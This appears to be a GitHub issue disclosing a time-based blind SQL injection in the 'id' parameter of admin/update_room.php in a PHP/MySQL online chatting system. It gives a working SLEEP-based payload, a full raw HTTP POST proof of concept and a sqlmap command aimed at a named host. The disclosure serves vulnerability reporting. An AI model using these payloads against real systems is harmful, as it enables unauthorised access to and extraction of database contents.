You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
WangPeng CUMT has discovered that Online Chatting System using PHP/MySQL is affected by serious security vulnerabilities due to insufficient protection of the "id" parameter in the "admin/update_room. php" file. This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database.
Vulnerability Details
Online Chatting System using PHP/MySQL V1.0
Vulnerable File: admin/update_room.php
Parameter Names: id
Attack Type: Remote
Description
WangPeng CUMT has discovered that Online Chatting System using PHP/MySQL is affected by serious security vulnerabilities due to insufficient protection of the "id" parameter in the "admin/update_room.php" file. This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database.
---
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: edit=1&id=1' AND (SELECT 9968 FROM (SELECT(SLEEP(5)))Xnth) AND 'Oiis'='Oiis&name=1&pass=1
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
POC
POST /admin/update_room.php HTTP/1.1
Host: www.onlinechatting.com:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
edit=1&id=1' AND (SELECT 9968 FROM (SELECT(SLEEP(10)))Xnth) AND 'Oiis'='Oiis&name=1&pass=1
The text was updated successfully, but these errors were encountered:
Online Chatting System using PHP/MySQL update_room.php - SQL injection vulnerability
Vendor Homepage
Software Link
Overview
Vulnerability Details
Description
Proof of Concept (PoC) :
sqlmap -u 'http://www.onlinechatting.com:8089/admin/update_room.php' -p 'id' --data="id=1"--method='POST'
POC
The text was updated successfully, but these errors were encountered: